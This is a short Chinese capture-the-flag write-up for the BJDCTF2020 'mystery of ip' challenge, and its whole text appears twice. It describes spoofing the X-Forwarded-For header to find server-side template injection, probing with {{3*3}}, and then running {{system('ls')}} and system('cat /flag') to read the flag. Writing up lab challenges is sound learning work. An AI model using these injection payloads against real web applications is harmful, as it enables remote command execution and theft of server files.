[BJDCTF2020]The mystery of ip1
flag.php 中显示本机ip地址
hint.php
X-Forwarded-For 是一个 HTTP 扩展头部。表示 HTTP 请求端真实 IP。
flag.php抓包
一般做题head头部不是sql注入就是ssti
验证:{{3*3}}
存在ssti注入
{{system(‘ls’)}}
system(‘cat /flag’)
对ssti认知模糊,还得对ssti学习。
[BJDCTF2020]The mystery of ip1
flag.php 中显示本机ip地址
hint.php
X-Forwarded-For 是一个 HTTP 扩展头部。表示 HTTP 请求端真实 IP。
flag.php抓包
一般做题head头部不是sql注入就是ssti
验证:{{3*3}}
存在ssti注入
{{system(‘ls’)}}
system(‘cat /flag’)
对ssti认知模糊,还得对ssti学习。